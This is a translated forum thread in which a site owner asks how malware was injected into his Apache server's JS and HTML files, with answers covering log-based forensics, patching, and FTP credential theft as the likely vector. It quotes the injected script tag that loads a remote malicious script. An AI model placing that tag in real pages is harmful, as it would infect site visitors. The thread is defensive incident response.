我的网站被 Google / StopBadware.org 标记为危险网站,我在几个 js/html 文件中发现了这一点:
<script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script>
<!--a0e2c33acd6c12bdc9e3f3ba50c98197-->
我清理了几个文件,恢复了备份,但如何了解蠕虫是如何安装的?我在日志文件中可以查找什么?这台服务器,Centos 5,仅用作 apache 服务器,安装了我们的程序、tikiwiki 和 drupal。
谢谢
Cédric
答案1
入侵事件分析从来都不是一件容易的事,特别是如果你没有遵循标准的恢复程序(使物理服务器脱机,获取它可以访问的所有文件系统的扇区映像,从安装媒体完全重建机器,恢复数据)。
通常,您会首先查看所有日志文件,从 Apache 日志开始。最有可能的攻击媒介是 drupal,但它绝不是唯一可能的攻击媒介,因此应检查所有日志(我的意思是所有日志)。根据您使用的文件系统,可以采取其他步骤来确定感染时发生了哪些活动,并找出所使用的攻击媒介和所做的事情。
同时,检查机器正在运行的所有软件,确保它们都是最新的。这包括所有 drupal 模块、主题等。我还会用梳子检查任何自定义代码。
编辑:我忘了提到这样一个事实,在你的情况下,由于你显然没有相关的专业知识,你可能需要考虑将事件承包给进行法医分析的安全公司:这可能有点昂贵,但你会得到关于发生了什么以及如何防止它的明确答案。
答案2
我们的服务器也存在这个问题(从 6 月 11 日开始),蠕虫注入的内容与您上面写的完全相同。
看起来与 apache/php 相关的任何东西都没有任何联系;蠕虫只是通过 FTP 连接并将这些脚本标记附加到 *.php 和 *.html。没有无效密码;它们第一次尝试就成功了。
因此,我认为这可能与客户端有关。我认为客户端感染了病毒,要么监听任何 FTP 活动,要么检查 FileZilla 中保存的任何密码。但我不确定,并将进一步调查此事。如果您有任何运气,请通过此帖子通知我们。
编辑:仅供参考,我们的客户没有使用 Drupal。它只使用 Joomla 和一些静态 HTML 文件。